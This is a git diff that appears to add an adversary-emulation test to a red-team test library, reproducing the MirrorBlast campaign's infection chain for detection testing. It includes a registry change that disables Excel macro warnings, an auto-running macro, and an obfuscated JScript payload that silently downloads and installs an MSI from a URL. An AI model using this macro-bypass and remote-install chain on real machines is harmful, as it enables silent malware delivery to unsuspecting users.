diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 43cd18bb..76bb8da2 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -408,3 +408,17 @@ atomic_tests: Remove-Item $file1 -ErrorAction Ignore Remove-Item $file2 -ErrorAction Ignore name: powershell +- name: Mirror Blast Emulation + description: | + Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed. + Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies) + supported_platforms: + - windows + executor: + command: |- + Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs" + New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null + & '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm + cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f + name: powershell + diff --git a/atomics/T1204.002/bin/mirrorblast_emulation.xlsm b/atomics/T1204.002/bin/mirrorblast_emulation.xlsm new file mode 100644 index 00000000..dc76be04 Binary files /dev/null and b/atomics/T1204.002/bin/mirrorblast_emulation.xlsm differ diff --git a/atomics/T1204.002/src/Mirror Blast.txt b/atomics/T1204.002/src/Mirror Blast.txt new file mode 100644 index 00000000..59d7c92d --- /dev/null +++ b/atomics/T1204.002/src/Mirror Blast.txt @@ -0,0 +1,12 @@ +The file that was added to binary is the excel spreadsheet that has the macro to download 7zip. + +VBA code (in auto_open excel module) +Sub Auto_Open() With CreateObject("ScriptControl") .Language = "JScript" .AddCode (Range("A1").Value) End With EndSub +--------------------- + +Encoded JS Command: +eval('}kk)kk"kkikkskkmkk.kk4kk6kkxkk-kk7kk0kk1kk2kkzkk7kk/kkakk/kkgkkrkkokk.kkpkkikkzkk-kk7kk.kkwkkwkkwkk/kk/kk:kkskkpkktkktkkhkk"kk(kktkkckkukkdkkokkrkkPkklkklkkakktkkskknkkIkk;kk1kk=kklkkekkvkkekkLkkIkkUkk{kk)kk)kk"kkrkkekklkklkkakktkkskknkkIkk.kkrkkekklkklkkakktkkskknkkIkkskkwkkokkdkknkkikkWkk"kk(kktkkckkekkjkkbkkOkkXkkekkvkkikktkkckkAkk kkwkkekknkk(kkhkktkkikkw'.split('kk').reverse().join('')) + +-------------------- +Decoded JS Command: +with(new ActiveXObject("WindowsInstaller.Installer")){UILevel=1;InstallProduct("https://www.7-zip.org/a/7z2107-x64.msi")} \ No newline at end of file